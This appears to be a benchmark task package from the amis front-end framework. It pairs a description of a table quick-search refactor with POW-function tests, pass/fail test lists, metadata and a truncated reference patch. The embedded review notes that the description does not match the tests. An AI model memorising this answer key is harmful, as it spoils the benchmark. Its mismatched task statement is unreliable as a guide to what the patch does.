([link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L217-R207))
**Title** Remove residual sorting logic from column quick‑search and streamline related components **Problem** The quick‑search dropdown in table headers still injected hidden sorting fields (`orderBy`, `orderDir`) and relied on outdated class‑based implementation, causing confusing query parameters and unnecessary complexity. Similar leftover sorting handling existed in the CRUD store and example configuration. **Root Cause** Sorting‑related code was never fully removed after refactoring, and the component used an internal store copy instead of the incoming props for data synchronization. **Fix / Expected Behavior** - Eliminate hidden sorting fields from the quick‑search form schema and stop passing `orderBy`/`orderDir` to the dropdown. - Rewrite the dropdown as a functional component using hooks, with proper opening/closing logic and overlay container handling. - Ensure the dropdown only emits the `columnSearch` event with the actual search values. - Update the CRUD example to use a header toolbar form for mode selection and keyword search, removing the old `filter` block. - Adjust the store sync to use the component’s `data` prop, and simplify query handling in the CRUD store. - Extend the generic `mapObject` helper to accept an optional skip function and propagate it through recursive calls. - Update schema translation utilities to forward the new skip parameter. - Add the `POW` mathematical function to the formula engine with documentation. **Risk & Validation** - Verify that table column search no longer includes sorting parameters and that the `columnSearch` event receives correct payloads. - Test the CRUD list example to confirm mode‑based API calls and keyword search work as expected. - Run the existing test suite, especially UI rendering and formula evaluation tests, to ensure no regressions from the functional component conversion. - Manually check that translation and helper utilities still operate correctly with the added `skipFn` argument.
8,360
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 4670b3906..2fb97d99a 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -539,3 +539,26 @@ test('evalute:ISTYPE', () => { expect(evaluate('${ISTYPE(f, "plain-object")}', data)).toBe(true); expect(evaluate('${ISTYPE(g, "date")}', data)).toBe(true); }); + +test('evalute:Math', () => { + const data = { + float: 0.5, + integer1: 2, + integer2: 4, + negativeInteger: -2, + array: [1, 2 ,3], + infinity: Infinity + } + + expect(evaluate('${POW(integer1, integer2)}', data)).toBe(16); + expect(evaluate('${POW(integer2, 0.5)}', data)).toBe(2); + expect(evaluate('${POW(integer1, -2)}', data)).toBe(0.25); + /** 计算结果不合法,则返回NaN */ + expect(evaluate('${POW(negativeInteger, 0.5)}', data)).toBe(NaN); + /** 参数值不合法,则返回基数本身*/ + expect(evaluate('${POW(array, 2)}', data)).toBe(data.array); + /** 测试Infinity */ + expect(evaluate('${POW(infinity, 2)}', data)).toBe(data.infinity); + expect(evaluate('${POW(1, infinity)}', data)).toBe(NaN); + expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); +})
[ "evalute:Math" ]
[ "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "lexer:simple", "lexer:filter", "lexer:exception", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Method: Evaluator.fnPOW(base: number, exponent: number) Location: packages/amis-formula/src/evalutor.ts → class Evaluator Inputs: - **base**: `number` – the base value for exponentiation. If not a number, the function returns the original `base` unchanged. - **exponent**: `number` – the exponent value. If not a number, the function returns the original `base` unchanged. Outputs: - Returns a `number` equal to `Math.pow(base, exponent)`. If the computation results in an invalid number (e.g., a negative base with a non‑integer exponent), the result is `NaN`. For non‑numeric arguments, the original `base` is returned unchanged. Description: Calculates the exponentiation of `base` raised to `exponent`. Used by the Formula evaluator when the `POW` function appears in an expression (e.g., `${POW(a, b)}`). Handles type validation and propagates `NaN` for mathematically invalid results.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 11, "num_modified_lines": 212, "pr_author": "2betop", "pr_labels": [ "chore" ], "llm_metadata": { "code": "B1", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": true, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L6-R6" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue describes refactoring the table header quick‑search component and removing sorting logic, but the provided test patch adds tests for a new POW function in the formula evaluator, which is unrelated to the UI change. The tests do not verify the described behavior, indicating a coupling between the test suite and unrelated code. Therefore the primary problem is a test‑suite coupling issue (B1).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests target POW function in amis‑formula, while issue concerns HeadCellSearchDropDown UI refactor", "No tests verify the removal of sorting fields or the new hook‑based component" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, 
"test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
79728ddad4ddfdad819d4ea6e152790ba2aa410e
2023-10-12 06:11:20
github-actions[bot]: <!-- Labeler (https://github.com/jimschubert/labeler) --> 👍 Thanks for this! 🏷 I have applied any labels matching special text in your issue. Please review the labels and make any necessary changes.
baidu__amis-8365
diff --git a/docs/zh-CN/components/table2.md b/docs/zh-CN/components/table2.md index 3443a8ef2..a3515bd8a 100755 --- a/docs/zh-CN/components/table2.md +++ b/docs/zh-CN/components/table2.md @@ -24,7 +24,8 @@ order: 67 "columns": [ { "title": "Engine", - "name": "engine" + "name": "engine", + "width": 120 }, { "title": "Version", @@ -933,8 +934,36 @@ order: 67 { "title": "Version", "name": "version", - "fixed": "left", - "width": 100 + "type": "property", + "width": 400, + "items": [ + { + "label": "cpu", + "content": "1 core" + }, + { + "label": "memory", + "content": "4G" + }, + { + "label": "disk", + "content": "80G" + }, + { + "label": "network", + "content": "4M", + "span": 2 + }, + { + "label": "IDC", + "content": "beijing" + }, + { + "label": "Note", + "content": "其它说明", + "span": 3 + } + ] }, { "title": "Browser", @@ -1969,7 +1998,7 @@ order: 67 "data":{ "rows":[ { - "engine":"Trident", + "engine":"Trident1", "browser":"Internet Explorer 4.0", "platform":"Win 95+", "version":"4", @@ -1977,7 +2006,7 @@ order: 67 "id":1, "children":[ { - "engine":"Trident", + "engine":"Trident1-1", "browser":"Internet Explorer 4.0", "platform":"Win 95+", "version":"4", @@ -1985,7 +2014,7 @@ order: 67 "id":1001, "children":[ { - "engine":"Trident", + "engine":"Trident1-1-1", "browser":"Internet Explorer 4.0", "platform":"Win 95+", "version":"4", @@ -1993,7 +2022,7 @@ order: 67 "id":10001 }, { - "engine":"Trident", + "engine":"Trident1-1-2", "browser":"Internet Explorer 5.0", "platform":"Win 95+", "version":"5", @@ -2003,7 +2032,7 @@ order: 67 ] }, { - "engine":"Trident", + "engine":"Trident1-2", "browser":"Internet Explorer 5.0", "platform":"Win 95+", "version":"5", @@ -2013,7 +2042,7 @@ order: 67 ] }, { - "engine":"Trident", + "engine":"Trident2", "browser":"Internet Explorer 5.0", "platform":"Win 95+", "version":"5", @@ -2021,7 +2050,7 @@ order: 67 "id":2, "children":[ { - "engine":"Trident", + "engine":"Trident2-1", "browser":"Internet Explorer 4.0", "platform":"Win 95+", 
"version":"4", @@ -2029,7 +2058,7 @@ order: 67 "id":2001 }, { - "engine":"Trident", + "engine":"Trident2-2", "browser":"Internet Explorer 5.0", "platform":"Win 95+", "version":"5", @@ -2123,6 +2152,10 @@ order: 67 "type":"table2", "source":"$rows", "columns":[ + { + "name":"id", + "title":"ID" + }, { "name":"engine", "title":"Engine" @@ -2321,6 +2354,10 @@ order: 67 "type":"table2", "source":"$rows", "columns":[ + { + "name": "id", + "title": "ID" + }, { "name":"engine", "title":"Engine" diff --git a/examples/components/CRUD/List.jsx b/examples/components/CRUD/List.jsx index 15d65c389..18aef7409 100644 --- a/examples/components/CRUD/List.jsx +++ b/examples/components/CRUD/List.jsx @@ -3,32 +3,18 @@ export default { remark: 'bla bla bla', body: { type: 'crud', - api: '/api/sample', + name: 'thelist', + api: { + method: 'get', + url: '/api/sample', + sendOn: '${mode}' + }, mode: 'list', draggable: true, saveOrderApi: { url: '/api/sample/saveOrder' }, orderField: 'weight', - filter: { - title: '条件搜索', - submitText: '', - body: [ - { - type: 'input-text', - name: 'keywords', - placeholder: '通过关键字搜索', - addOn: { - label: '搜索', - type: 'submit' - } - }, - { - type: 'plain', - text: '这只是个示例, 目前搜索对查询结果无效.' 
- } - ] - }, affixHeader: true, bulkActions: [ { @@ -63,6 +49,44 @@ export default { ], quickSaveApi: '/api/sample/bulkUpdate', quickSaveItemApi: '/api/sample/$id', + headerToolbar: [ + { + type: 'form', + mode: 'inline', + wrapWithPanel: false, + submitOnChange: true, + submitOnInit: true, + target: 'thelist', + body: [ + { + type: 'select', + name: 'mode', + className: 'mb-0', + selectFirst: true, + options: [ + { + label: '模式 1', + value: 'mode1' + }, + { + label: '模式 2', + value: 'mode2' + } + ] + }, + { + type: 'input-text', + name: 'keywords', + placeholder: '通过关键字搜索', + className: 'mb-0', + addOn: { + label: '搜索', + type: 'submit' + } + } + ] + } + ], listItem: { actions: [ { diff --git a/fis-conf.js b/fis-conf.js index 98590a300..fb70f4d97 100644 --- a/fis-conf.js +++ b/fis-conf.js @@ -253,7 +253,7 @@ fis.match('*.html:jsx', { // 这些用了 esm fis.match( - '{echarts/**.js,zrender/**.js,echarts-wordcloud/**.js,markdown-it-html5-media/**.js,react-hook-form/**.js,qrcode.react/**.js,axios/**.js}', + '{echarts/**.js,zrender/**.js,echarts-wordcloud/**.js,markdown-it-html5-media/**.js,react-hook-form/**.js,qrcode.react/**.js,axios/**.js,downshift/**.js,react-intersection-observer/**.js}', { parser: fis.plugin('typescript', { sourceMap: false, diff --git a/packages/amis-core/src/WithStore.tsx b/packages/amis-core/src/WithStore.tsx index 6e1c37aee..6c9a0d4b9 100644 --- a/packages/amis-core/src/WithStore.tsx +++ b/packages/amis-core/src/WithStore.tsx @@ -252,7 +252,7 @@ export function HocStoreFactory(renderer: { props.store?.storeType === 'ComboStore' ? 
undefined : syncDataFromSuper( - store.data, + props.data, (props.data as any).__super, (prevProps.data as any).__super, store, diff --git a/packages/amis-core/src/renderers/Form.tsx b/packages/amis-core/src/renderers/Form.tsx index 3f88f3910..e33734f60 100644 --- a/packages/amis-core/src/renderers/Form.tsx +++ b/packages/amis-core/src/renderers/Form.tsx @@ -1154,6 +1154,8 @@ export default class Form extends React.Component<FormProps, object> { if (target) { this.submitToTarget(filterTarget(target, values), values); + /** 可能配置页面跳转事件,页面路由变化导致persistKey不一致,无法清除持久化数据,所以提交成功事件之前先清理一下 */ + clearPersistDataAfterSubmit && store.clearLocalPersistData(); dispatchEvent('submitSucc', createObject(this.props.data, values)); } else if (action.actionType === 'reload') { action.target && @@ -1185,6 +1187,7 @@ export default class Form extends React.Component<FormProps, object> { ? filter(saveFailed, store.data) : undefined, onSuccess: async (result: Payload) => { + clearPersistDataAfterSubmit && store.clearLocalPersistData(); // result为提交接口返回的内容 const dispatcher = await dispatchEvent( 'submitSucc', @@ -1245,6 +1248,7 @@ export default class Form extends React.Component<FormProps, object> { }); }); } else { + clearPersistDataAfterSubmit && store.clearLocalPersistData(); // type为submit,但是没有配api以及target时,只派发事件 dispatchEvent('submitSucc', createObject(this.props.data, values)); } diff --git a/packages/amis-core/src/store/crud.ts b/packages/amis-core/src/store/crud.ts index dc2df1cc6..d254a63f5 100644 --- a/packages/amis-core/src/store/crud.ts +++ b/packages/amis-core/src/store/crud.ts @@ -61,12 +61,11 @@ export const CRUDStore = ServiceStore.named('CRUDStore') // 因为会把数据呈现在地址栏上。 return createObject( createObject(self.data, { - ...self.query, items: self.items.concat(), selectedItems: self.selectedItems.concat(), unSelectedItems: self.unSelectedItems.concat() }), - {} + {...self.query} ); }, diff --git a/packages/amis-core/src/store/table2.ts b/packages/amis-core/src/store/table2.ts 
index 793e8fb64..1adc52e08 100644 --- a/packages/amis-core/src/store/table2.ts +++ b/packages/amis-core/src/store/table2.ts @@ -280,12 +280,17 @@ export const TableStore2 = ServiceStore.named('TableStore2') }); } - function getRowByIndex(rowIndex: number, levels?: Array<string>): IRow2 { + function getRowByIndex( + rowIndex: number, + levels?: Array<number>, + rows?: Array<IRow2> + ): IRow2 { + rows = rows || self.rows; if (levels && levels.length > 0) { const index = +(levels.shift() || 0); - return getRowByIndex(index, levels); + return getRowByIndex(rowIndex, levels, rows[index].children); } - return self.rows[rowIndex]; + return rows[rowIndex]; } function isSelected(row: IRow2): boolean { diff --git a/packages/amis-core/src/utils/debug.tsx b/packages/amis-core/src/utils/debug.tsx index c15e9507b..8f4a23371 100644 --- a/packages/amis-core/src/utils/debug.tsx +++ b/packages/amis-core/src/utils/debug.tsx @@ -8,10 +8,12 @@ import {findDOMNode, render, unmountComponentAtNode} from 'react-dom'; // import {createRoot} from 'react-dom/client'; import {autorun, observable} from 'mobx'; import {observer} from 'mobx-react'; -import {uuidv4} from './helper'; +import {uuidv4, importLazyComponent} from './helper'; import position from './position'; -export const JsonView = React.lazy(() => import('react-json-view')); +export const JsonView = React.lazy(() => + import('react-json-view').then(importLazyComponent) +); class Log { @observable cat = ''; diff --git a/packages/amis-core/src/utils/helper.ts b/packages/amis-core/src/utils/helper.ts index ebbdfc9e8..71ddc701d 100644 --- a/packages/amis-core/src/utils/helper.ts +++ b/packages/amis-core/src/utils/helper.ts @@ -2175,3 +2175,8 @@ export function evalTrackExpression( }) .join(''); } + +// 很奇怪的问题,react-json-view import 有些情况下 mod.default 才是 esModule +export function importLazyComponent(mod: any) { + return mod.default.__esModule ? 
mod.default : mod; +} diff --git a/packages/amis-editor-core/src/plugin/DataDebug.tsx b/packages/amis-editor-core/src/plugin/DataDebug.tsx index b68429d0d..0e26fc97a 100644 --- a/packages/amis-editor-core/src/plugin/DataDebug.tsx +++ b/packages/amis-editor-core/src/plugin/DataDebug.tsx @@ -1,7 +1,10 @@ import {registerEditorPlugin} from '../manager'; import {BaseEventContext, BasePlugin, BasicToolbarItem} from '../plugin'; import React from 'react'; -export const JsonView = React.lazy(() => import('react-json-view')); +import {importLazyComponent} from 'amis-core'; +export const JsonView = React.lazy(() => + import('react-json-view').then(importLazyComponent) +); /** * 添加调试功能 diff --git a/packages/amis-editor/src/renderer/FormulaControl.tsx b/packages/amis-editor/src/renderer/FormulaControl.tsx index 84b6d5824..b6c03d110 100644 --- a/packages/amis-editor/src/renderer/FormulaControl.tsx +++ b/packages/amis-editor/src/renderer/FormulaControl.tsx @@ -515,21 +515,13 @@ export default class FormulaControl extends React.Component< } else { curRendererSchema.placeholder = '请输入静态值'; } - // 设置popOverContainer - if (!curRendererSchema.popOverContainer) { - curRendererSchema.popOverContainer = window.document.body; - } } JSONPipeOut(curRendererSchema); // 对 schema 进行国际化翻译 if (this.appLocale && this.appCorpusData) { - return translateSchema( - curRendererSchema, - this.appCorpusData, - (item: any) => item.__reactFiber || item.__reactProp // 在nextjs 13中,window.document.body对象,有__reactFiber,__reactProp 两个子对象,递归遍历会导致死循环,因此过滤掉 - ); + return translateSchema(curRendererSchema, this.appCorpusData); } return curRendererSchema; diff --git a/packages/amis-formula/src/doc.md b/packages/amis-formula/src/doc.md index f571ac097..37b95f335 100644 --- a/packages/amis-formula/src/doc.md +++ b/packages/amis-formula/src/doc.md @@ -268,6 +268,17 @@ 取数据最后一个。 +### POW + +用法:`POW(base, exponent)` + + * `base:number` 基数 + * `exponent:number` 指数 + +返回:`number` 基数的指数次幂 + 
+返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + ## 文本函数 ### LEFT diff --git a/packages/amis-formula/src/doc.ts b/packages/amis-formula/src/doc.ts index c3a72cf65..5291b3029 100644 --- a/packages/amis-formula/src/doc.ts +++ b/packages/amis-formula/src/doc.ts @@ -465,6 +465,29 @@ export const doc: { }, namespace: '数学函数' }, + { + name: 'POW', + description: + '返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。', + example: 'POW(base, exponent)', + params: [ + { + type: 'number', + name: 'base', + description: '基数' + }, + { + type: 'number', + name: 'exponent', + description: '指数' + } + ], + returns: { + type: 'number', + description: '基数的指数次幂' + }, + namespace: '数学函数' + }, { name: 'LEFT', description: '返回传入文本左侧的指定长度字符串。', diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 7befa4b79..6f85541d1 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -13,6 +13,7 @@ import uniqBy from 'lodash/uniqBy'; import isEqual from 'lodash/isEqual'; import isPlainObject from 'lodash/isPlainObject'; import get from 'lodash/get'; +import isNumber from 'lodash/isNumber'; import {EvaluatorOptions, FilterContext, FilterMap, FunctionMap} from './types'; import {FormulaEvalError} from './error'; @@ -978,6 +979,24 @@ export class Evaluator { return arr.length ? 
arr[arr.length - 1] : null; } + /** + * 返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + * + * @example POW(base, exponent) + * @param {number} base 基数 + * @param {number} exponent 指数 + * @namespace 数学函数 + * + * @returns {number} 基数的指数次幂 + */ + fnPOW(base: number, exponent: number) { + if (!isNumber(base) || !isNumber(exponent)) { + return base; + } + + return Math.pow(base, exponent); + } + // 文本函数 normalizeText(raw: any) { @@ -1215,6 +1234,7 @@ export class Evaluator { */ fnBEFORELAST(text: string, delimiter: string = '.') { text = this.normalizeText(text); + delimiter = this.normalizeText(delimiter); return text.split(delimiter).slice(0, -1).join(delimiter) || text + ''; } @@ -1298,6 +1318,7 @@ export class Evaluator { * @returns {string} 判断结果 */ fnSTARTSWITH(text: string, search: string) { + search = this.normalizeText(search); if (!search) { return false; } @@ -1317,6 +1338,7 @@ export class Evaluator { * @returns {string} 判断结果 */ fnENDSWITH(text: string, search: string) { + search = this.normalizeText(search); if (!search) { return false; } @@ -1336,6 +1358,7 @@ export class Evaluator { * @returns {string} 判断结果 */ fnCONTAINS(text: string, search: string) { + search = this.normalizeText(search); if (!search) { return false; } @@ -1357,8 +1380,14 @@ export class Evaluator { */ fnREPLACE(text: string, search: string, replace: string) { text = this.normalizeText(text); + search = this.normalizeText(search); + replace = this.normalizeText(replace); let result = text; + if (typeof replace === 'undefined' || !search) { + return result; + } + while (true) { const idx = result.indexOf(search); @@ -1387,11 +1416,12 @@ export class Evaluator { * @returns {number} 命中的位置 */ fnSEARCH(text: string, search: string, start: number = 0) { + search = this.normalizeText(search); text = this.normalizeText(text); start = this.formatNumber(start); const idx = text.indexOf(search, start); - if (~idx) { + if (~idx && search) { return idx; } @@ -1411,6 +1441,8 @@ 
export class Evaluator { */ fnMID(text: string, from: number, len: number) { text = this.normalizeText(text); + from = this.formatNumber(from); + len = this.formatNumber(len); return text.substring(from, from + len); } diff --git a/packages/amis-ui/scss/components/_table2.scss b/packages/amis-ui/scss/components/_table2.scss index 3905cf69c..57ba2dccf 100644 --- a/packages/amis-ui/scss/components/_table2.scss +++ b/packages/amis-ui/scss/components/_table2.scss @@ -527,12 +527,9 @@ color: var(--TableRow-onDisabled-color); } - > tbody - > tr:not(.#{$ns}Table-row-disabled) - > td.#{$ns}Table-cell-row-hover { - background: var(--Table-onHover-bg); - border-color: var(--Table-onHover-borderColor); - color: var(--Table-onHover-color); + > tbody > tr > td.#{$ns}Table-cell-fix-left, + > tbody > tr > td.#{$ns}Table-cell-fix-right { + background: inherit; } > thead > tr > th.#{$ns}Table-cell-fix-left-last, @@ -553,7 +550,7 @@ > thead > tr > th.#{$ns}Table-cell-fix-right-first, > tbody > tr > td.#{$ns}Table-cell-fix-right-first, - > tfoot > tr > td.#{$ns}Table-cell-fix-right-last { + > tfoot > tr > td.#{$ns}Table-cell-fix-right-first { &:after { position: absolute; top: 0; @@ -610,10 +607,6 @@ > td.#{$ns}Table-cell-fix-left { border-right: none; } - - > td.#{$ns}Table-cell-fix-left:not(.#{$ns}Table-cell-row-hover) { - background: #fff; - } } > tfoot > tr > td:not(:last-child) { @@ -644,10 +637,6 @@ > td.#{$ns}Table-cell-fix-right { border-right: none; } - - > td.#{$ns}Table-cell-fix-right:not(.#{$ns}Table-cell-row-hover) { - background: #fff; - } } } diff --git a/packages/amis-ui/src/components/table/Cell.tsx b/packages/amis-ui/src/components/table/Cell.tsx index 588571db4..c54846f86 100644 --- a/packages/amis-ui/src/components/table/Cell.tsx +++ b/packages/amis-ui/src/components/table/Cell.tsx @@ -54,7 +54,6 @@ export class BodyCell extends React.Component<Props> { style, groupId, depth, - index, col, wrapperComponent: Component, classnames: cx @@ -73,7 +72,6 @@ export class 
BodyCell extends React.Component<Props> { data-group-id={groupId || null} data-depth={depth || null} data-col={col} - data-index={index === -1 ? null : index} > {children} </Component> diff --git a/packages/amis-ui/src/components/table/ColGroup.tsx b/packages/amis-ui/src/components/table/ColGroup.tsx new file mode 100644 index 000000000..85cad4b03 --- /dev/null +++ b/packages/amis-ui/src/components/table/ColGroup.tsx @@ -0,0 +1,75 @@ +import React from 'react'; +import {observer} from 'mobx-react'; + +import {ColumnProps} from './index'; + +export function ColGroup({ + columns, + colWidths, + isFixed, + syncTableWidth, + initTableWidth, + showReal +}: { + columns: Array<ColumnProps>; + colWidths: { + [key: string]: { + width: number; + realWidth: number; + minWidth: number; + originWidth: number; + }; + }; + isFixed: boolean; + syncTableWidth: Function; + initTableWidth: Function; + showReal?: boolean; +}) { + const domRef = React.createRef<HTMLTableColElement>(); + + React.useEffect(() => { + if (domRef.current) { + initTableWidth(); + syncTableWidth(); + } + }, []); + + React.useEffect(() => { + const table = domRef.current!.parentElement!; + const observer = new MutationObserver(() => { + syncTableWidth(); + }); + observer.observe(table, { + attributes: true, + childList: true, + subtree: true + }); + return () => { + observer.disconnect(); + }; + }, []); + + return ( + <colgroup ref={domRef}> + {columns.map((col, index) => { + const style: any = {}; + + if (colWidths[col?.name]?.width) { + style.width = colWidths[col?.name].width; + } else if (col.width) { + style.width = col.width; + } else if (showReal) { + style.width = col.realWidth; + } + + if (!isFixed && style.width) { + style.minWidth = style.width; + } + + return <col style={style} key={index} />; + })} + </colgroup> + ); +} + +export default observer(ColGroup); diff --git a/packages/amis-ui/src/components/table/index.tsx b/packages/amis-ui/src/components/table/index.tsx index 408ccc1f9..0ea417963 
100644 --- a/packages/amis-ui/src/components/table/index.tsx +++ b/packages/amis-ui/src/components/table/index.tsx @@ -9,6 +9,7 @@ import findLastIndex from 'lodash/findLastIndex'; import find from 'lodash/find'; import isEqual from 'lodash/isEqual'; import filter from 'lodash/filter'; +import debounce from 'lodash/debounce'; import intersection from 'lodash/intersection'; import Sortable from 'sortablejs'; @@ -23,6 +24,7 @@ import { guid, autobind } from 'amis-core'; +import {resizeSensor} from 'amis-core'; import {Icon} from '../icons'; import CheckBox from '../Checkbox'; import Spinner, {SpinnerExtraProps} from '../Spinner'; @@ -32,6 +34,7 @@ import HeadCellFilter from './HeadCellFilter'; import HeadCellSelect from './HeadCellSelect'; import ItemActionsWrapper from './ItemActionsWrapper'; import Cell from './Cell'; +import ColGroup from './ColGroup'; export interface ColumnProps { title: string | React.ReactNode | Function; @@ -153,6 +156,7 @@ export interface TableProps extends ThemeProps, LocaleProps, SpinnerExtraProps { rowClassName?: Function; lineHeight?: string; // 可设置large、middle固定高度,不设置则跟随内容 showHeader?: boolean; // 是否展示表头 + tableLayout?: string; // auto fixed onSelect?: Function; onSelectAll?: Function; itemActions?: Function; @@ -168,7 +172,14 @@ export interface TableState { selectedRowKeys: Array<string | number>; dataSource: Array<any>; expandedRowKeys: Array<string | number>; - colWidths: Array<number>; + colWidths: { + [name: string]: { + width: number; + realWidth: number; + minWidth: number; + originWidth: number; + }; + }; hoverRow: { rowIndex?: number; record: any; @@ -332,7 +343,8 @@ export class Table extends React.PureComponent<TableProps, TableState> { columns: [], indentSize: 15, placeholder: '暂无数据', - showHeader: true + showHeader: true, + tableLayout: 'auto' }; constructor(props: TableProps) { @@ -359,7 +371,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { ? 
props.expandable.defaultExpandedRowKeys || [] : []) ], - colWidths: [], + colWidths: {}, hoverRow: null }; } @@ -393,6 +405,12 @@ export class Table extends React.PureComponent<TableProps, TableState> { tfootDom: React.RefObject<HTMLTableSectionElement> = React.createRef(); footDom: React.RefObject<HTMLDivElement> = React.createRef(); + toDispose: Array<() => void> = []; + updateTableInfoLazy = debounce(this.updateTableInfo.bind(this), 250, { + trailing: true, + leading: false + }); + getSelectedRows( dataSource: Array<any>, selectedRowKeys: Array<string | number> @@ -466,6 +484,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { ref.current.addEventListener('wheel', this.onWheel.bind(this)) ); } + current && this.updateTableDom(current); if (this.props.draggable && this.tbodyDom?.current) { @@ -473,6 +492,12 @@ export class Table extends React.PureComponent<TableProps, TableState> { } this.updateStickyHeader(); + + const currentNode = findDOMNode(this) as HTMLElement; + + this.toDispose.push( + resizeSensor(currentNode, this.updateTableInfoLazy, false, 'width') + ); } componentDidUpdate(prevProps: TableProps, prevState: TableState) { @@ -486,7 +511,6 @@ export class Table extends React.PureComponent<TableProps, TableState> { }, () => { this.updateTableFixedRows(); - this.syncTableWidth(); } ); } @@ -570,6 +594,10 @@ export class Table extends React.PureComponent<TableProps, TableState> { if (prevProps.sticky !== this.props.sticky) { this.updateStickyHeader(); } + + if (prevProps.columns !== this.props.columns) { + this.updateTableFixedRows(); + } } componentWillUnmount() { @@ -582,6 +610,11 @@ export class Table extends React.PureComponent<TableProps, TableState> { ); this.destroyDragging(); + + this.toDispose.forEach(fn => fn()); + this.toDispose = []; + + this.updateTableInfoLazy.cancel(); } initDragging() { @@ -668,6 +701,9 @@ export class Table extends React.PureComponent<TableProps, TableState> { const children = row.children; for 
(let i = 0; i < children.length; i++) { const dom = children[i] as HTMLElement; + + dom.style.removeProperty('left'); + const fixed = columns[i] ? columns[i].fixed || '' : ''; if (isFixedLeftColumn(fixed)) { dom.style.left = @@ -678,11 +714,16 @@ export class Table extends React.PureComponent<TableProps, TableState> { ? getAfterRightWidth(children, i, columns) + 'px' : '0'; } + + dom.classList.remove(cx('Table-cell-fix-left-last')); + dom.classList.remove(cx('Table-cell-fix-right-first')); + dom.classList.remove(cx('Table-cell-fix-right-first-prev')); } // 最后一个左fixed的添加样式 let leftIndex = findLastIndex(columns, column => isFixedLeftColumn(column.fixed) ); + if (leftIndex > -1) { children[leftIndex]?.classList.add(cx('Table-cell-fix-left-last')); } @@ -769,18 +810,19 @@ export class Table extends React.PureComponent<TableProps, TableState> { } } - renderColGroup() { + renderColGroup(showReal?: boolean) { + const {scroll, tableLayout} = this.props; + + const isFixed = !!((scroll && scroll.x) || tableLayout === 'fixed'); return ( - <colgroup> - {this.state.colWidths.map((width: number, index: number) => { - return ( - <col - key={index} - style={{width: typeof width === 'number' ? 
width + 'px' : width}} - ></col> - ); - })} - </colgroup> + <ColGroup + columns={this.tdColumns} + colWidths={this.state.colWidths} + isFixed={isFixed} + syncTableWidth={this.syncTableWidth} + initTableWidth={this.initTableWidth} + showReal={showReal} + ></ColGroup> ); } @@ -789,9 +831,9 @@ export class Table extends React.PureComponent<TableProps, TableState> { this.resizeStart = event.clientX; this.resizeTarget = event.currentTarget; - const extraCount = this.getExtraColumnCount(); + const column = this.tdColumns[index]; this.resizeIndex = index; - this.resizeWidth = this.state.colWidths[extraCount + this.resizeIndex]; + this.resizeWidth = this.state.colWidths[column.name].width; this.resizeTarget!.classList.add('is-resizing'); document.addEventListener('mousemove', this.onResizeMouseMove); @@ -806,6 +848,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { if (this.resizeTarget) { // 计算横向移动距离 const distance = event.clientX - this.resizeStart; + const column = this.tdColumns[this.resizeIndex]; let newWidth = 0; if (distance > 0) { newWidth = this.resizeWidth + distance; @@ -814,13 +857,12 @@ export class Table extends React.PureComponent<TableProps, TableState> { newWidth = Math.max( this.resizeWidth + distance, DefaultCellWidth, - this.tdColumns[this.resizeIndex].minWidth || 0 + column.minWidth || 0 ); } - const extraCount = this.getExtraColumnCount(); const colWidths = this.state.colWidths; - 